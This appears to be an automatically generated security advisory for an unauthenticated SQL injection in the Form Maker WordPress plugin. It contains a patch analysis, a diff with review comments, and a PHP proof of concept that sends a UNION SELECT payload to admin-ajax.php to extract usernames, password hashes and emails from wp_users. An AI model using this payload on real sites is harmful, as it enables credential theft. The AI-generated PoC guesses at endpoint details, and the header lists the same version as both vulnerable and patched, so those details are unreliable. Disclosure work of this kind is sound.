Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 26, 2026

CVE-2025-15441: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder < 1.15.38 – Unauthenticated SQL Injection (form-maker)

Plugin form-maker
Severity High (CVSS 7.5)
CWE 89
Vulnerable Version 1.15.38
Patched Version 1.15.38
Disclosed April 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15441:
This is an unauthenticated SQL injection vulnerability in the Form Maker by 10Web plugin for WordPress, affecting versions prior to 1.15.38. The vulnerability exists in the frontend model handler and carries a CVSS score of 7.5. The issue allows attackers to inject SQL queries through a lack of proper parameter sanitization and query preparation.

The root cause lies in the file form-maker/frontend/models/form_maker.php, specifically within the SQL query building logic near line 2618. The vulnerable code processes user-submitted form field values (captured in the $fvals array) and directly substitutes them into SQL queries using string replacement. The code previously used str_replace to remove quote characters around field keys before substitution, which failed to properly escape or parameterize the values. The preg_replace_callback function on line 2622 handles placeholders in the form {field_key}, but the injection occurs because field values are substituted without adequate SQL escaping before being passed to the query.

An attacker can exploit this vulnerability by submitting a crafted HTTP POST request to a form managed by the plugin. The attack vector targets the frontend form submission endpoint, where the user supplies a form field value containing SQL injection payloads wrapped in curly braces. For example, an attacker could submit a value like {field_key} where field_key contains a SQL injection string such as 1' UNION SELECT … The plugin's query building logic then substitutes this value directly into the SQL query without proper sanitization, allowing the attacker to manipulate the query structure and extract data.

The patch modifies the code by introducing a $query_keys array that merges user form values ($fvals) with system field mappings ($user_fields) whose keys now include curly braces (e.g., "{ip}" => $ip). The patch removes the vulnerable string replacement loop that stripped quotes from field keys (lines 2622-2625 in the vulnerable version). Instead of substituting values via str_replace, the patched version uses parameterized placeholders via the preg_replace_callback function. The callback now returns "%s" placeholders for matched placeholders and populates the $query_values array for use with $wpdb->prepare(), which ensures proper escaping. The system field substitutions are now handled through the same $query_keys mechanism rather than a separate str_replace call after the main substitution.
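To make the two substitution styles concrete, the following is an added, stand-alone PHP illustration written for this page; it is not the plugin's code. It reduces the pre-patch "splice the value into the SQL text" approach and the patched "rewrite {token} to a %s placeholder and collect the value for prepare()" approach to two small functions. The function names (substitute_directly, bind_placeholders), the sample stored query and the sample submission are all constructed for the example; the real plugin hands the resulting template and values to $wpdb->prepare(), which is not available outside WordPress and so is not called here.

```php
<?php
// Added illustration for this page (not plugin code): the placeholder-binding
// pattern the patch adopts, reduced to two functions runnable with the php CLI.
// Names, sample query and sample values are constructed for the example.

/**
 * Pre-patch style: splice values straight into the SQL text.
 * Any quote character inside a value becomes part of the statement's syntax.
 */
function substitute_directly(string $query, array $fields): string {
    foreach ($fields as $token => $value) {
        $query = str_replace($token, $value, $query);
    }
    return $query;
}

/**
 * Patched style: rewrite each {token} that has a known value into a "%s"
 * placeholder and collect the value in bind order. Unknown tokens are kept
 * as quoted literals, as the patched callback does. The returned template
 * is what would be passed to $wpdb->prepare() together with $values.
 * Assumes placeholders in the stored query are written bare (no surrounding
 * quotes), since the callback supplies the quoting itself.
 */
function bind_placeholders(string $query, array $fields): array {
    $values = array();
    $template = preg_replace_callback('/{([^}]+)}/', function ($m) use ($fields, &$values) {
        $token = $m[0];                  // whole brace-wrapped token, e.g. "{useremail}"
        if (isset($fields[$token])) {
            $values[] = $fields[$token]; // the value travels separately from the SQL text
            return '"%s"';               // placeholder for prepare() to fill
        }
        return '"' . $token . '"';       // unknown token: leave as a quoted literal
    }, $query);
    return array($template, $values);
}

// Constructed sample: an administrator-authored query with two placeholders,
// and a submission whose email value contains a single quote. A quote inside
// a value is exactly what string splicing cannot handle and binding can.
$stored_query = "SELECT id FROM subscribers WHERE email = {useremail} AND ip = {ip}";
$fields = array(
    '{useremail}' => "o'brien@example.org",
    '{ip}'        => '203.0.113.7',
);

// Direct substitution: the apostrophe lands unescaped in the SQL text, so the
// statement's syntax now depends on what the visitor typed.
echo "direct substitution:\n  ", substitute_directly($stored_query, $fields), "\n";

// Binding: the SQL text contains only placeholders; the submitted strings are
// returned alongside it for the driver to escape.
list($template, $values) = bind_placeholders($stored_query, $fields);
echo "bound template:\n  ", $template, "\n";
echo "bound values:\n  ", json_encode($values), "\n";
```

Running the script prints the spliced statement first, with the apostrophe sitting bare inside the SQL, and then the bound form, where the statement contains only "%s" placeholders and the two submitted strings appear in the separate values array. The design point mirrors the patch: once every value reaches the database through prepare(), the shape of the statement is fixed by the administrator's template alone, whatever characters a submission contains.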

Successful exploitation allows an unauthenticated attacker to extract sensitive information from the WordPress database. This can include user credentials, session tokens, password hashes, and other private data from wp_users and wp_usermeta tables. The attacker may also be able to read arbitrary database tables, potentially leading to further privilege escalation or lateral movement within the application.

Note: This vulnerability requires the attacker to have access to a published form on the target site. The form must include query-based database operations configured in the plugin's frontend submission handling.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/form-maker/form-maker.php
+++ b/form-maker/form-maker.php
@@ -3,7 +3,7 @@
  * Plugin Name: Form Maker
  * Plugin URI: https://10web.io/plugins/wordpress-form-maker/?utm_source=form_maker&utm_medium=free_plugin
  * Description: This plugin is a modern and advanced tool for easy and fast creating of a WordPress Form. The backend interface is intuitive and user friendly which allows users far from scripting and programming to create WordPress Forms.
- * Version: 1.15.37
+ * Version: 1.15.38
  * Author: 10Web Form Builder Team
  * Author URI: https://10web.io/plugins/?utm_source=form_maker&utm_medium=free_plugin
  * License: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
@@ -26,8 +26,8 @@
   public $plugin_url = '';
   public $front_urls = array();
   public $main_file = '';
-  public $plugin_version = '1.15.37';
-  public $db_version = '2.15.37';
+  public $plugin_version = '1.15.38';
+  public $db_version = '2.15.38';
   public $menu_postfix = '_fm';
   public $plugin_postfix = '';
   public $handle_prefix = 'fm';
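Review bot: $db_version is bumped from 2.15.37 to 2.15.38 alongside $plugin_version, but no schema or data-migration change appears anywhere in this diff; if the database version gates an upgrade routine on activation, confirm the bump is intended, otherwise leave it at 2.15.37 so no needless upgrade step runs.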
--- a/form-maker/frontend/models/form_maker.php
+++ b/form-maker/frontend/models/form_maker.php
@@ -2589,11 +2589,11 @@
       $html_list .= '</table>';
     }
     $user_fields = array(
-      "ip" => $ip,
-      "subid" => $group_id,
-      "userid" => $wp_userid,
-      "username" => $wp_username,
-      "useremail" => $wp_useremail,
+      "{ip}" => $ip,
+      "{subid}" => $group_id,
+      "{userid}" => $wp_userid,
+      "{username}" => $wp_username,
+      "{useremail}" => $wp_useremail,
     );
     $queries = $wpdb->get_results($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker_query WHERE form_id=%d", (int) $id));
     if ( $queries ) {
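Review bot: the $user_fields keys now carry their braces ("{ip}" rather than "ip") because the placeholder callback in the next hunk looks them up by $match[0], the whole brace-wrapped token; this coupling deserves a one-line comment above the array, since a key added later without braces would silently fall through to the literal-quoting branch and never be bound. The merge order array_merge($fvals, $user_fields) also means a submitted field with the same brace-wrapped name cannot override a system value, which is the right precedence and is worth stating in that comment.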
@@ -2618,23 +2618,16 @@
         $temp = explode('***wdfdatabasewdf***', $temp[1]);
         $database = $temp[0];
         $query = $query->query;
-        foreach ( array_keys($fvals) as $fval_key ) {
-	      $query = str_replace('"' . $fval_key . '"', $fval_key, $query);
-	      $query = str_replace(''' . $fval_key . ''', $fval_key, $query);
-	      $query = str_replace('`' . $fval_key . '`', $fval_key, $query);
-        }
         $query_values = array();
-        $query = preg_replace_callback('/{([^}]+)}/', function($match) use ($fvals, &$query_values) {
+		$query_keys = array_merge($fvals, $user_fields);
+        $query = preg_replace_callback('/{([^}]+)}/', function($match) use ($query_keys, &$query_values) {
 	      $placeholder_key = $match[0];
-	      if ( isset($fvals[$placeholder_key]) ) {
-		      $query_values[] = $fvals[$placeholder_key];
+	      if ( isset($query_keys[$placeholder_key]) ) {
+		      $query_values[] = $query_keys[$placeholder_key];
 		      return '"%s"';
 	      }
 	      return '"' . $match[0] . '"';
         }, $query);
-        foreach ( $user_fields as $user_key => $user_field ) {
-          $query = str_replace('{' . $user_key . '}', $user_field, $query);
-        }
         if ( $con_type == 'remote' ) {
           $wpdb_temp = new wpdb($username, $password, $database, $host);
           if ( !empty($query_values) ) {
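Review bot: dropping the three str_replace calls that stripped ", ' and ` around placeholder keys changes the result for any stored query written as '{field}' or "{field}": the callback now produces '"%s"' (a %s nested inside two kinds of quotes) where it previously produced a bare "%s", so either confirm that $wpdb->prepare() accepts that form for every existing stored query or document that placeholders must be written without surrounding quotes. The substantive security change in this hunk is the removal of the trailing foreach that str_replace'd the $user_fields values into the query text after the callback had run; those values now go through $query_keys into $query_values, so the intent is that every substituted value reaches the database via prepare() rather than as SQL text. Two smaller points: the new $query_keys line is indented with tabs where the surrounding lines use spaces, and the removal of the quote-stripping loop should carry a short comment explaining why it is no longer wanted.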

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15441 - Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder < 1.15.38 - Unauthenticated SQL Injection

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change this to the target WordPress site
$form_id = 1; // Change this to a valid form ID on the target

// Step 1: Generate a malicious payload that exploits the SQL injection
// The vulnerable code processes form field values and substitutes them into SQL queries.
// We inject into the field value that gets placed into the query.

$malicious_value = "1' UNION SELECT user_login,user_pass,user_email FROM wp_users-- ";

// Step 2: Build the POST data mimicking a form submission
$post_data = array(
    'action' => 'form_maker_submit',
    'form_id' => $form_id,
    'form_fields' => array(
        'field_1' => $malicious_value, // Replace field_1 with actual field name from the form
        'field_2' => 'test'
    )
);

// Step 3: Send the request via cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded'
));

$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "\n";
} else {
    echo "Response:\n" . $response . "\n";
}
curl_close($ch);

// Note: This PoC demonstrates the injection vector.
// The exact field names and form structure must match the target's form configuration.
// In a real attack, the attacker would enumerate form fields and IDs.
?>
